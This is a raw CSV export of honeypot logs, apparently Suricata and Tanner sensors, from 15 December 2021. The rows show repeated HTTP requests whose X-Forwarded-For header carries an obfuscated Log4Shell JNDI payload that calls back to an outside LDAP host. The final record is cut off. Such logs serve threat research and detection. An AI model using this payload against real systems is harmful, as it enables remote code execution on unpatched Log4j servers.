"2021-12-15T04:37:48.142Z",1,EnlhvH0B6VkG8jKz3CLk,"logstash-suricata-2021.12.15",,"_doc","515176a4-579a-4537-b388-8ddbb4052e4d",1cfdf650501c,"e0271bff-cac9-4c26-8dd0-3bb24343acf1",1cfdf650501c,filebeat,"7.11.1",,,,,,,,,,,,,,,,http,,,,,,"165.22.231.66",40366,,,"1.6.0",,fileinfo,,,,,,,,,,,,,,,,,,,,,,,"/",false,"HTML document, Unicode text, UTF-8 text, with very long lines (2102)",bb01c1060ecc1bf4eb4f6a2291787714,"[]",52671,CLOSED,false,0,,,,,,,63651165489715,,,,NA,US,US,"United States",,"172.16.0.42","35.2296","{""lon"":-80.843,""lat"":35.2296}","-80.843",,NC,"North Carolina","America/New_York",,,,,,,,,,,,,,,1cfdf650501c,,,,,"172.16.0.42","text/html",GET,,,,,,,"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36",52671,"HTTP/1.1",200,"/",,"${jndi:${lower:l}${lower:d}a${lower:p}://xf.world80.log4j.bin${upper:a}ryedge.io:80/callback}",,,eth0,log,,,,,,,,"/data/suricata/log/eve.json",771601,,"{""timestamp"":""2021-12-15T04:37:48.142592+0000"",""flow_id"":63651165489715,""in_iface"":""eth0"",""event_type"":""fileinfo"",""src_ip"":""172.16.0.42"",""src_port"":80,""dest_ip"":""165.22.231.66"",""dest_port"":40366,""proto"":""TCP"",""http"":{""hostname"":""172.16.0.42"",""url"":""/"",""http_user_agent"":""Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36"",""xff"":""${jndi:${lower:l}${lower:d}a${lower:p}://xf.world80.log4j.bin${upper:a}ryedge.io:80/callback}"",""http_content_type"":""text/html"",""http_method"":""GET"",""protocol"":""HTTP/1.1"",""status"":200,""length"":52671},""app_proto"":""http"",""fileinfo"":{""filename"":""/"",""sid"":[],""magic"":""HTML document, Unicode text, UTF-8 text, with very long lines (2102)"",""gaps"":false,""state"":""CLOSED"",""md5"":""bb01c1060ecc1bf4eb4f6a2291787714"",""stored"":false,""size"":52671,""tx_id"":0}}",,,,,,,,,,,,,,,TCP,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"172.16.0.42",80,,,,,,,,,,,,healthycongresswoman,"172.16.0.42","172.16.0.42","[""suricata"",""beats_input_codec_plain_applied"",""_geoip_lookup_failure""]",,,,"2021-12-15T04:37:48.142592+0000",,,,,,,,,Suricata,,,,
"2021-12-15T04:37:48.010Z",1,VKphvH0BCXMCNTQL5MoQ,"logstash-tanner-2021.12.15",,"_doc","515176a4-579a-4537-b388-8ddbb4052e4d",1cfdf650501c,"e0271bff-cac9-4c26-8dd0-3bb24343acf1",1cfdf650501c,filebeat,"7.11.1",,,,,,,,,,,,,,,,,,,,,,,80,,,"1.6.0",,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,Toronto,NA,CA,CA,Canada,,"165.22.231.66","43.6547","{""lon"":-79.3623,""lat"":43.6547}","-79.3623",M5A,ON,Ontario,"America/Toronto",,,,"*/*","gzip, deflate",,,"keep-alive",,,"172.16.0.42",,"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36","${jndi:${lower:l}${lower:d}a${lower:p}://xf.world80.log4j.bin${upper:a}ryedge.io:80/callback}",1cfdf650501c,,,,,,,,,,,,,,,,,,,,,,,,log,,,,,,,,"/data/tanner/log/tanner_report.json",5196,,"{""method"": ""GET"", ""path"": ""/"", ""headers"": {""host"": ""172.16.0.42"", ""user-agent"": ""Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36"", ""accept-encoding"": ""gzip, deflate"", ""accept"": ""*/*"", ""connection"": ""keep-alive"", ""x-forwarded-for"": ""${jndi:${lower:l}${lower:d}a${lower:p}://xf.world80.log4j.bin${upper:a}ryedge.io:80/callback}""}, ""uuid"": ""655e7949-87b2-4518-bb03-916470861a18"", ""peer"": {""ip"": ""165.22.231.66"", ""port"": 40366}, ""status"": 200, ""cookies"": {""sess_uuid"": null}, ""response_msg"": {""version"": ""0.6.0"", ""response"": {""message"": {""detection"": {""name"": ""index"", ""order"": 1, ""type"": 1, ""version"": ""0.6.0""}, ""sess_uuid"": ""9b7027c9-70fb-4e2c-a98b-7067f6612628""}}}, ""timestamp"": ""2021-12-15T04:37:48.010666""}",,,,,,GET,,,,,,"/",,,,,,,,,,,index,1,1,"0.6.0","9b7027c9-70fb-4e2c-a98b-7067f6612628","0.6.0",,,,,,,,,,,,,,,,,,"165.22.231.66",40366,,,,,,,,,200,,,healthycongresswoman,"172.16.0.42","172.16.0.42","[""tanner"",""beats_input_codec_plain_applied"",""_geoip_lookup_failure""]",,,,"2021-12-15T04:37:48.010666",,,,,,,,,Tanner,,,"655e7949-87b2-4518-bb03-916470861a18",
"2021-12-15T04:35:13.898Z",1,1HlfvH0B6VkG8jKzgg4A,"logstash-suricata-2021.12.15",,"_doc","9f01c876-ebd5-49c8-ac0f-6a9b9c912cfe",b4503e7c168d,"76eee910-a015-4adc-8fe0-687ab8c194fa",b4503e7c168d,filebeat,"7.11.1",,,,,,,,,,,,,,,,,,,,,,"172.16.0.42",80,,,"1.6.0",,http,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,776690888397016,"College of St. Scholastica",30376,Duluth,NA,US,US,"United States",676,"143.110.216.17","46.8147","{""lon"":-92.1998,""lat"":46.8147}","-92.1998",55811,MN,Minnesota,"America/Chicago",,,,,,,,,,,,,,,b4503e7c168d,"gzip, deflate",,,,"172.16.0.42","image/png",GET,,,,,,,"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36",3631,"HTTP/1.1",200,"/core/img/favicon-touch.png",,"${jndi:${lower:l}${lower:d}a${lower:p}://xf.world80.log4j.bin${upper:a}ryedge.io:80/callback}",,,eth0,log,,,,,,,,"/data/suricata/log/eve.json",4962418,,"{""timestamp"":""2021-12-15T04:35:13.898829+0000"",""flow_id"":776690888397016,""in_iface"":""eth0"",""event_type"":""http"",""src_ip"":""143.110.216.17"",""src_port"":33228,""dest_ip"":""172.16.0.42"",""dest_port"":80,""proto"":""TCP"",""tx_id"":2,""http"":{""hostname"":""172.16.0.42"",""url"":""/core/img/favicon-touch.png"",""http_user_agent"":""Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36"",""xff"":""${jndi:${lower:l}${lower:d}a${lower:p}://xf.world80.log4j.bin${upper:a}ryedge.io:80/callback}"",""http_content_type"":""image/png"",""accept_encoding"":""gzip, deflate"",""http_method"":""GET"",""protocol"":""HTTP/1.1"",""status"":200,""length"":3631}}",,,,,,,,,,,,,,,TCP,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"143.110.216.17",33228,,,,,,,,,,,,highvalley,"172.16.0.42","172.16.0.42","[""suricata"",""beats_input_codec_plain_applied""]",,,,"2021-12-15T04:35:13.898829+0000",,,,,,,,2,Suricata,,,,
"2021-12-15T04:35:13.898Z",1,1XlfvH0B6VkG8jKzgg4A,"logstash-suricata-2021.12.15",,"_doc","9f01c876-ebd5-49c8-ac0f-6a9b9c912cfe",b4503e7c168d,"76eee910-a015-4adc-8fe0-687ab8c194fa",b4503e7c168d,filebeat,"7.11.1",,,,,,,,,,,,,,,,http,,,,,,"143.110.216.17",33228,,,"1.6.0",,fileinfo,,,,,,,,,,,,,,,,,,,,,,,"/core/img/favicon-touch.png",false,"PNG image data, 128 x 128, 8-bit/color RGBA, non-interlaced",da318bff7465546a1d7ac2b31fd38967,"[]",3631,CLOSED,false,2,,,,,,,776690888397016,"Digital Ocean, Inc.",14061,,AS,SG,SG,Singapore,,"172.16.0.42","1.314","{""lon"":103.6839,""lat"":1.314}","103.6839",62,,,"Asia/Singapore",,,,,,,,,,,,,,,b4503e7c168d,,,,,"172.16.0.42","image/png",GET,,,,,,,"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36",3631,"HTTP/1.1",200,"/core/img/favicon-touch.png",,"${jndi:${lower:l}${lower:d}a${lower:p}://xf.world80.log4j.bin${upper:a}ryedge.io:80/callback}",,,eth0,log,,,,,,,,"/data/suricata/log/eve.json",4963084,,"{""timestamp"":""2021-12-15T04:35:13.898829+0000"",""flow_id"":776690888397016,""in_iface"":""eth0"",""event_type"":""fileinfo"",""src_ip"":""172.16.0.42"",""src_port"":80,""dest_ip"":""143.110.216.17"",""dest_port"":33228,""proto"":""TCP"",""http"":{""hostname"":""172.16.0.42"",""url"":""/core/img/favicon-touch.png"",""http_user_agent"":""Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36"",""xff"":""${jndi:${lower:l}${lower:d}a${lower:p}://xf.world80.log4j.bin${upper:a}ryedge.io:80/callback}"",""http_content_type"":""image/png"",""http_method"":""GET"",""protocol"":""HTTP/1.1"",""status"":200,""length"":3631},""app_proto"":""http"",""fileinfo"":{""filename"":""/core/img/favicon-touch.png"",""sid"":[],""magic"":""PNG image data, 128 x 128, 8-bit/color RGBA, non-interlaced"",""gaps"":false,""state"":""CLOSED"",""md5"":""da318bff7465546a1d7ac2b31fd38967"",""stored"":false,""size"":3631,""tx_id"":2}}",,,,,,,,,,,,,,,TCP,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"172.16.0.42",80,,,,,,,,,,,,highvalley,"172.16.0.42","172.16.0.42","[""suricata"",""beats_input_codec_plain_applied""]",,,,"2021-12-15T04:35:13.898829+0000",,,,,,,,,Suricata,,,,
"2021-12-15T04:35:13.655Z",1,2XlfvH0B6VkG8jKzgg4Q,"logstash-tanner-2021.12.15",,"_doc","9f01c876-ebd5-49c8-ac0f-6a9b9c912cfe",b4503e7c168d,"76eee910-a015-4adc-8fe0-687ab8c194fa",b4503e7c168d,filebeat,"7.11.1",,,,,,,,,,,,,,,,,,,,,"a08345b8-ca67-4ab8-b616-146834f924d5",,80,,,"1.6.0",,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"College of St. Scholastica",30376,Duluth,NA,US,US,"United States",676,"143.110.216.17","46.8147","{""lon"":-92.1998,""lat"":46.8147}","-92.1998",55811,MN,Minnesota,"America/Chicago",,,,"*/*","gzip, deflate",,,"keep-alive","sess_uuid=a08345b8-ca67-4ab8-b616-146834f924d5",,"172.16.0.42",,"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36","${jndi:${lower:l}${lower:d}a${lower:p}://xf.world80.log4j.bin${upper:a}ryedge.io:80/callback}",b4503e7c168d,,,,,,,,,,,,,,,,,,,,,,,,log,,,,,,,,"/data/tanner/log/tanner_report.json",3640,,"{""method"": ""GET"", ""path"": ""/core/img/favicon-touch.png"", ""headers"": {""host"": ""172.16.0.42"", ""user-agent"": ""Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36"", ""accept-encoding"": ""gzip, deflate"", ""accept"": ""*/*"", ""connection"": ""keep-alive"", ""x-forwarded-for"": ""${jndi:${lower:l}${lower:d}a${lower:p}://xf.world80.log4j.bin${upper:a}ryedge.io:80/callback}"", ""cookie"": ""sess_uuid=a08345b8-ca67-4ab8-b616-146834f924d5""}, ""uuid"": ""413c1313-acfc-49f0-93ac-a0508fe5247f"", ""peer"": {""ip"": ""143.110.216.17"", ""port"": 33228}, ""status"": 200, ""cookies"": {""sess_uuid"": ""a08345b8-ca67-4ab8-b616-146834f924d5""}, ""response_msg"": {""version"": ""0.6.0"", ""response"": {""message"": {""detection"": {""name"": ""index"", ""order"": 1, ""type"": 1, ""version"": ""0.6.0""}, ""sess_uuid"": ""0763fe27-5c09-41cd-952a-0323477eaca9""}}}, ""timestamp"": ""2021-12-15T04:35:13.655198""}",,,,,,GET,,,,,,"/core/img/favicon-touch.png",,,,,,,,,,,index,1,1,"0.6.0","0763fe27-5c09-41cd-952a-0323477eaca9","0.6.0",,,,,,,,,,,,,,,,,,"143.110.216.17",33228,,,,,,,,,200,,,highvalley,"172.16.0.42","172.16.0.42","[""tanner"",""beats_input_codec_plain_applied""]",,,,"2021-12-15T04:35:13.655198",,,,,,,,,Tanner,,,"413c1313-acfc-49f0-93ac-a0508fe5247f",
"2021-12-15T04:35:13.574Z",1,0nlfvH0B6VkG8jKzgg4A,"logstash-suricata-2021.12.15",,"_doc","9f01c876-ebd5-49c8-ac0f-6a9b9c912cfe",b4503e7c168d,"76eee910-a015-4adc-8fe0-687ab8c194fa",b4503e7c168d,filebeat,"7.11.1",,,,,,,,,,,,,,,,http,,,,,,"143.110.216.17",33228,,,"1.6.0",,fileinfo,,,,,,,,,,,,,,,,,,,,,,,"/favicon.ico",false,"HTML document, ASCII text",838827d66cb0bd3693641815c694ca88,"[]",208,CLOSED,false,1,,,,,,,776690888397016,"Digital Ocean, Inc.",14061,,AS,SG,SG,Singapore,,"172.16.0.42","1.314","{""lon"":103.6839,""lat"":1.314}","103.6839",62,,,"Asia/Singapore",,,,,,,,,,,,,,,b4503e7c168d,,,,,"172.16.0.42","text/html",GET,,,,,,,"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36",208,"HTTP/1.1",404,"/favicon.ico",,"${jndi:${lower:l}${lower:d}a${lower:p}://xf.world80.log4j.bin${upper:a}ryedge.io:80/callback}",,,eth0,log,,,,,,,,"/data/suricata/log/eve.json",4960932,,"{""timestamp"":""2021-12-15T04:35:13.574802+0000"",""flow_id"":776690888397016,""in_iface"":""eth0"",""event_type"":""fileinfo"",""src_ip"":""172.16.0.42"",""src_port"":80,""dest_ip"":""143.110.216.17"",""dest_port"":33228,""proto"":""TCP"",""http"":{""hostname"":""172.16.0.42"",""url"":""/favicon.ico"",""http_user_agent"":""Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36"",""xff"":""${jndi:${lower:l}${lower:d}a${lower:p}://xf.world80.log4j.bin${upper:a}ryedge.io:80/callback}"",""http_content_type"":""text/html"",""http_method"":""GET"",""protocol"":""HTTP/1.1"",""status"":404,""length"":208},""app_proto"":""http"",""fileinfo"":{""filename"":""/favicon.ico"",""sid"":[],""magic"":""HTML document, ASCII text"",""gaps"":false,""state"":""CLOSED"",""md5"":""838827d66cb0bd3693641815c694ca88"",""stored"":false,""size"":208,""tx_id"":1}}",,,,,,,,,,,,,,,TCP,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"172.16.0.42",80,,,,,,,,,,,,highvalley,"172.16.0.42","172.16.0.42","[""suricata"",""beats_input_codec_plain_applied""]",,,,"2021-12-15T04:35:13.574802+0000",,,,,,,,,Suricata,,,,
"2021-12-15T04:35:13.574Z",1,0XlfvH0B6VkG8jKzgg4A,"logstash-suricata-2021.12.15",,"_doc","9f01c876-ebd5-49c8-ac0f-6a9b9c912cfe",b4503e7c168d,"76eee910-a015-4adc-8fe0-687ab8c194fa",b4503e7c168d,filebeat,"7.11.1",,,,,,,,,,,,,,,,,,,,,,"172.16.0.42",80,,,"1.6.0",,http,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,776690888397016,"College of St. Scholastica",30376,Duluth,NA,US,US,"United States",676,"143.110.216.17","46.8147","{""lon"":-92.1998,""lat"":46.8147}","-92.1998",55811,MN,Minnesota,"America/Chicago",,,,,,,,,,,,,,,b4503e7c168d,"gzip, deflate",,,,"172.16.0.42","text/html",GET,,,,,,,"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36",208,"HTTP/1.1",404,"/favicon.ico",,"${jndi:${lower:l}${lower:d}a${lower:p}://xf.world80.log4j.bin${upper:a}ryedge.io:80/callback}",,,eth0,log,,,,,,,,"/data/suricata/log/eve.json",4960282,,"{""timestamp"":""2021-12-15T04:35:13.574802+0000"",""flow_id"":776690888397016,""in_iface"":""eth0"",""event_type"":""http"",""src_ip"":""143.110.216.17"",""src_port"":33228,""dest_ip"":""172.16.0.42"",""dest_port"":80,""proto"":""TCP"",""tx_id"":1,""http"":{""hostname"":""172.16.0.42"",""url"":""/favicon.ico"",""http_user_agent"":""Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36"",""xff"":""${jndi:${lower:l}${lower:d}a${lower:p}://xf.world80.log4j.bin${upper:a}ryedge.io:80/callback}"",""http_content_type"":""text/html"",""accept_encoding"":""gzip, deflate"",""http_method"":""GET"",""protocol"":""HTTP/1.1"",""status"":404,""length"":208}}",,,,,,,,,,,,,,,TCP,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"143.110.216.17",33228,,,,,,,,,,,,highvalley,"172.16.0.42","172.16.0.42","[""suricata"",""beats_input_codec_plain_applied""]",,,,"2021-12-15T04:35:13.574802+0000",,,,,,,,1,Suricata,,,,
"2021-12-15T04:35:13.331Z",1,2HlfvH0B6VkG8jKzgg4Q,"logstash-tanner-2021.12.15",,"_doc","9f01c876-ebd5-49c8-ac0f-6a9b9c912cfe",b4503e7c168d,"76eee910-a015-4adc-8fe0-687ab8c194fa",b4503e7c168d,filebeat,"7.11.1",,,,,,,,,,,,,,,,,,,,,"a08345b8-ca67-4ab8-b616-146834f924d5",,80,,,"1.6.0",,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"College of St. Scholastica",30376,Duluth,NA,US,US,"United States",676,"143.110.216.17","46.8147","{""lon"":-92.1998,""lat"":46.8147}","-92.1998",55811,MN,Minnesota,"America/Chicago",,,,"*/*","gzip, deflate",,,"keep-alive","sess_uuid=a08345b8-ca67-4ab8-b616-146834f924d5",,"172.16.0.42",,"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36","${jndi:${lower:l}${lower:d}a${lower:p}://xf.world80.log4j.bin${upper:a}ryedge.io:80/callback}",b4503e7c168d,,,,,,,,,,,,,,,,,,,,,,,,log,,,,,,,,"/data/tanner/log/tanner_report.json",2756,,"{""method"": ""GET"", ""path"": ""/favicon.ico"", ""headers"": {""host"": ""172.16.0.42"", ""user-agent"": ""Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36"", ""accept-encoding"": ""gzip, deflate"", ""accept"": ""*/*"", ""connection"": ""keep-alive"", ""x-forwarded-for"": ""${jndi:${lower:l}${lower:d}a${lower:p}://xf.world80.log4j.bin${upper:a}ryedge.io:80/callback}"", ""cookie"": ""sess_uuid=a08345b8-ca67-4ab8-b616-146834f924d5""}, ""uuid"": ""413c1313-acfc-49f0-93ac-a0508fe5247f"", ""peer"": {""ip"": ""143.110.216.17"", ""port"": 33228}, ""status"": 200, ""cookies"": {""sess_uuid"": ""a08345b8-ca67-4ab8-b616-146834f924d5""}, ""response_msg"": {""version"": ""0.6.0"", ""response"": {""message"": {""detection"": {""name"": ""index"", ""order"": 1, ""type"": 1, ""version"": ""0.6.0""}, ""sess_uuid"": ""0763fe27-5c09-41cd-952a-0323477eaca9""}}}, ""timestamp"": ""2021-12-15T04:35:13.331778""}",,,,,,GET,,,,,,"/favicon.ico",,,,,,,,,,,index,1,1,"0.6.0","0763fe27-5c09-41cd-952a-0323477eaca9","0.6.0",,,,,,,,,,,,,,,,,,"143.110.216.17",33228,,,,,,,,,200,,,highvalley,"172.16.0.42","172.16.0.42","[""tanner"",""beats_input_codec_plain_applied""]",,,,"2021-12-15T04:35:13.331778",,,,,,,,,Tanner,,,"413c1313-acfc-49f0-93ac-a0508fe5247f",
"2021-12-15T04:35:12.697Z",1,napfvH0BCXMCNTQLfrU9,"logstash-suricata-2021.12.15",,"_doc","9f01c876-ebd5-49c8-ac0f-6a9b9c912cfe",b4503e7c168d,"76eee910-a015-4adc-8fe0-687ab8c194fa",b4503e7c168d,filebeat,"7.11.1",,,,,,,,,,,,,,,,,,,,,,"172.16.0.42",80,,,"1.6.0",,http,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,776690888397016,"College of St. Scholastica",30376,Duluth,NA,US,US,"United States",676,"143.110.216.17","46.8147","{""lon"":-92.1998,""lat"":46.8147}","-92.1998",55811,MN,Minnesota,"America/Chicago",,,,,,,,,,,,,,,b4503e7c168d,"gzip, deflate",,,,"172.16.0.42","text/html",GET,,,,,,,"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36",9652,"HTTP/1.1",200,"/",,"${jndi:${lower:l}${lower:d}a${lower:p}://xf.world80.log4j.bin${upper:a}ryedge.io:80/callback}",,,eth0,log,,,,,,,,"/data/suricata/log/eve.json",4957510,,"{""timestamp"":""2021-12-15T04:35:12.697087+0000"",""flow_id"":776690888397016,""in_iface"":""eth0"",""event_type"":""http"",""src_ip"":""143.110.216.17"",""src_port"":33228,""dest_ip"":""172.16.0.42"",""dest_port"":80,""proto"":""TCP"",""tx_id"":0,""http"":{""hostname"":""172.16.0.42"",""url"":""/"",""http_user_agent"":""Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36"",""xff"":""${jndi:${lower:l}${lower:d}a${lower:p}://xf.world80.log4j.bin${upper:a}ryedge.io:80/callback}"",""http_content_type"":""text/html"",""accept_encoding"":""gzip, deflate"",""http_method"":""GET"",""protocol"":""HTTP/1.1"",""status"":200,""length"":9652}}",,,,,,,,,,,,,,,TCP,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"143.110.216.17",33228,,,,,,,,,,,,highvalley,"172.16.0.42","172.16.0.42","[""suricata"",""beats_input_codec_plain_applied""]",,,,"2021-12-15T04:35:12.697087+0000",,,,,,,,0,Suricata,,,,
"2021-12-15T04:35:12.697Z",1,nqpfvH0BCXMCNTQLfrU9,"logstash-suricata-2021.12.15",,"_doc","9f01c876-ebd5-49c8-ac0f-6a9b9c912cfe",b4503e7c168d,"76eee910-a015-4adc-8fe0-687ab8c194fa",b4503e7c168d,filebeat,"7.11.1",,,,,,,,,,,,,,,,http,,,,,,"143.110.216.17",33228,,,"1.6.0",,fileinfo,,,,,,,,,,,,,,,,,,,,,,,"/",false,"HTML document, ASCII text",ac56291293ec6186a86afc3495db6b7f,"[]",9652,CLOSED,false,0,,,,,,,776690888397016,"Digital Ocean, Inc.",14061,,AS,SG,SG,Singapore,,"172.16.0.42","1.314","{""lon"":103.6839,""lat"":1.314}","103.6839",62,,,"Asia/Singapore",,,,,,,,,,,,,,,b4503e7c168d,,,,,"172.16.0.42","text/html",GET,,,,,,,"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36",9652,"HTTP/1.1",200,"/",,"${jndi:${lower:l}${lower:d}a${lower:p}://xf.world80.log4j.bin${upper:a}ryedge.io:80/callback}",,,eth0,log,,,,,,,,"/data/suricata/log/eve.json",4958150,,"{""timestamp"":""2021-12-15T04:35:12.697087+0000"",""flow_id"":776690888397016,""in_iface"":""eth0"",""event_type"":""fileinfo"",""src_ip"":""172.16.0.42"",""src_port"":80,""dest_ip"":""143.110.216.17"",""dest_port"":33228,""proto"":""TCP"",""http"":{""hostname"":""172.16.0.42"",""url"":""/"",""http_user_agent"":""Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36"",""xff"":""${jndi:${lower:l}${lower:d}a${lower:p}://xf.world80.log4j.bin${upper:a}ryedge.io:80/callback}"",""http_content_type"":""text/html"",""http_method"":""GET"",""protocol"":""HTTP/1.1"",""status"":200,""length"":9652},""app_proto"":""http"",""fileinfo"":{""filename"":""/"",""sid"":[],""magic"":""HTML document, ASCII text"",""gaps"":false,""state"":""CLOSED"",""md5"":""ac56291293ec6186a86afc3495db6b7f"",""stored"":false,""size"":9652,""tx_id"":0}}",,,,,,,,,,,,,,,TCP,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"172.16.0.42",80,,,,,,,,,,,,highvalley,"172.16.0.42","172.16.0.42","[""suricata"",""beats_input_codec_plain_applied""]",,,,"2021-12-15T04:35:12.697087+0000",,,,,,,,,Suricata,,,,
"2021-12-15T04:35:12.436Z",1,13lfvH0B6VkG8jKzgg4Q,"logstash-tanner-2021.12.15",,"_doc","9f01c876-ebd5-49c8-ac0f-6a9b9c912cfe",b4503e7c168d,"76eee910-a015-4adc-8fe0-687ab8c194fa",b4503e7c168d,filebeat,"7.11.1",,,,,,,,,,,,,,,,,,,,,,,80,,,"1.6.0",,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"College of St. Scholastica",30376,Duluth,NA,US,US,"United States",676,"143.110.216.17","46.8147","{""lon"":-92.1998,""lat"":46.8147}","-92.1998",55811,MN,Minnesota,"America/Chicago",,,,"*/*","gzip, deflate",,,"keep-alive",,,"172.16.0.42",,"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36","${jndi:${lower:l}${lower:d}a${lower:p}://xf.world80.log4j.bin${upper:a}ryedge.io:80/callback}",b4503e7c168d,,,,,,,,,,,,,,,,,,,,,,,,log,,,,,,,,"/data/tanner/log/tanner_report.json",1977,,"{""method"": ""GET"", ""path"": ""/"", ""headers"": {""host"": ""172.16.0.42"", ""user-agent"": ""Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36"", ""accept-encoding"": ""gzip, deflate"", ""accept"": ""*/*"", ""connection"": ""keep-alive"", ""x-forwarded-for"": ""${jndi:${lower:l}${lower:d}a${lower:p}://xf.world80.log4j.bin${upper:a}ryedge.io:80/callback}""}, ""uuid"": ""413c1313-acfc-49f0-93ac-a0508fe5247f"", ""peer"": {""ip"": ""143.110.216.17"", ""port"": 33228}, ""status"": 200, ""cookies"": {""sess_uuid"": null}, ""response_msg"": {""version"": ""0.6.0"", ""response"": {""message"": {""detection"": {""name"": ""index"", ""order"": 1, ""type"": 1, ""version"": ""0.6.0""}, ""sess_uuid"": ""a08345b8-ca67-4ab8-b616-146834f924d5""}}}, ""timestamp"": ""2021-12-15T04:35:12.436578""}",,,,,,GET,,,,,,"/",,,,,,,,,,,index,1,1,"0.6.0","a08345b8-ca67-4ab8-b616-146834f924d5","0.6.0",,,,,,,,,,,,,,,,,,"143.110.216.17",33228,,,,,,,,,200,,,highvalley,"172.16.0.42","172.16.0.42","[""tanner"",""beats_input_codec_plain_applied""]",,,,"2021-12-15T04:35:12.436578",,,,,,,,,Tanner,,,"413c1313-acfc-49f0-93ac-a0508fe5247f",
"2021-12-15T04:30:02.627Z",1,EBZavH0B5e7x5EYnxy0l,"logstash-suricata-2021.12.15",,"_doc","bfef6616-2b38-4fa6-8e90-ec99ad931ae5",cf47c22e327e,"ddfbf2f0-c8c7-4b2c-8b34-0d09a985408a",cf47c22e327e,filebeat,"7.11.1",,,,,,,,,,,,,,,,http,,,,,,"138.197.202.163",39574,,,"1.6.0",,fileinfo,,,,,,,,,,,,,,,,,,,,,,,"/favicon.ico",false,"MS Windows icon resource - 3 icons, 16x16, 32 bits/pixel, 24x24, 32 bits/pixel",d316e1622c58825727e7e4e6c954d289,"[]",7886,CLOSED,false,2,,,,,,,1069742929081953,,,"Frankfurt am Main",EU,DE,DE,Germany,,"172.16.0.42","50.1155","{""lon"":8.6842,""lat"":50.1155}","8.6842",60313,HE,Hesse,"Europe/Berlin",,,,,,,,,,,,,,,cf47c22e327e,,,,,"172.16.0.42","image/x-icon",GET,,,,,,,"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36",7886,"HTTP/1.1",200,"/favicon.ico?1528612569",,"${jndi:${lower:l}${lower:d}a${lower:p}://xf.world80.log4j.bin${upper:a}ryedge.io:80/callback}",,,eth0,log,,,,,,,,"/data/suricata/log/eve.json",5375081,,"{""timestamp"":""2021-12-15T04:30:02.627752+0000"",""flow_id"":1069742929081953,""in_iface"":""eth0"",""event_type"":""fileinfo"",""src_ip"":""172.16.0.42"",""src_port"":80,""dest_ip"":""138.197.202.163"",""dest_port"":39574,""proto"":""TCP"",""http"":{""hostname"":""172.16.0.42"",""url"":""/favicon.ico?1528612569"",""http_user_agent"":""Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 